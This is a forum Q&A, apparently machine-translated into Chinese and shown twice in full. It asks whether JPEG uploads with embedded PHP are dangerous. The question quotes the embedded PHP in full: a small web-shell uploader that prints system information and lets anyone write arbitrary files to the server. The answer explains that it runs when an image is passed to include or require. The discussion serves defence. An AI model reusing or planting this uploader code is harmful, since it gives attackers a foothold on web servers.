用户上传的包含 php 代码的 jpg 文件 - 这是潜在的病毒吗
user uploaded jpg file that contains php code - is this a potential virus
用户上传了一些 jpg 图片,其中似乎包含一些 php 代码。文件以 ÿØÿà 开头,后跟 NUL DLE JFIF NUL SOH SOH SOH NUL NUL NUL NUL ÿá NUL SYN Exif NUL NUL II* ...(更多空字符等)。然后是下面的php代码:
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
后面跟着很多二进制代码。图片显示一只脚是黑色的(就像把脚放在扫描仪或复印机上一样)。
这些图片有潜在危险吗?如果是,如何。
是的。这是一个利用已知错误的代码注入,阅读更多:http://php.webtutor.pl/en/2011/05/13/php-code-injection-a-simple-virus-written-in-php-and-carried-in-a-jpeg-image/
如果您的 php 脚本使用 require($image) 或 include($image) 来显示您的图像,这些图像只会执行代码,否则,请不要担心。不要忘记跟踪用户并可能将他列入黑名单:)
用户上传了一些 jpg 图片,其中似乎包含一些 php 代码。文件以 ÿØÿà 开头,后跟 NUL DLE JFIF NUL SOH SOH SOH NUL NUL NUL NUL ÿá NUL SYN Exif NUL NUL II* ...(更多空字符等)。然后是下面的php代码:
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
后面跟着很多二进制代码。图片显示一只脚是黑色的(就像把脚放在扫描仪或复印机上一样)。
这些图片有潜在危险吗?如果是,如何。
是的。这是一个利用已知错误的代码注入,阅读更多:http://php.webtutor.pl/en/2011/05/13/php-code-injection-a-simple-virus-written-in-php-and-carried-in-a-jpeg-image/
如果您的 php 脚本使用 require($image) 或 include($image) 来显示您的图像,这些图像只会执行代码,否则,请不要担心。不要忘记跟踪用户并可能将他列入黑名单:)